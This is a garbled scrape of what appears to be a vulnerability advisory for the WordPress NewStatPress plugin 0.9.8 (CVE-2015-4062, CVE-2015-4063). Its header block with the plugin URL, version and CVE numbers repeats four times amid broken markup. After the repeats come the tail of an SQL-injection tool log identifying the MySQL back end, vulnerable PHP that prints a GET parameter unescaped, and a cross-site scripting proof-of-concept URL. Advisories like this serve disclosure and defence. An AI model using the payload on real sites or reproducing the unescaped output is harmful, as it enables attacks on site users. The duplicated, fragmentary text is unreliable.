https://wordpress.org/plugins/newstatpress/
影响版本:0.9.8
Active installs: 20,000+
CVE: CVE-2015-4062, CVE-2015-4063
...">
影响版本:0.9.8
Active installs: 20,000+
CVE: CVE-2015-4062, CVE-2015-4063
...">https://wordpress.org/plugins/newstatpress/
影响版本:0.9.8
Active installs: 20,000+
CVE: CVE-2015-4062, CVE-2015-4063
...">https://wordpress.org/plugins/newstatpress/
影响版本:0.9.8
Active installs: 20,000+
CVE: CVE-2015-4062, CVE-2015-4063
...">
[12:25:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.39
back-end DBMS: MySQL 5.0.12
</pre><p><br></p><h2>2)xss[CWE-79] (CVE-2015-4063)</h2><p>includes/nsp_search.php:128<br></p><blockquote><p>for($i=1;$i<=3;$i++) {</p><p> if($_GET[“where$i”] != ‘’) { print “<th scope=‘col’>”.ucfirst($_GET[“where$i”]).“</th>”; }</p><p>}</p></blockquote><p>POC:<br></p><pre>http://[domain]/wp-admin/admin.php?where1=<script>alert(String.fromCharCode(88,+83,+83))</script>&searchsubmit=Buscar&page=nsp_search<br></pre>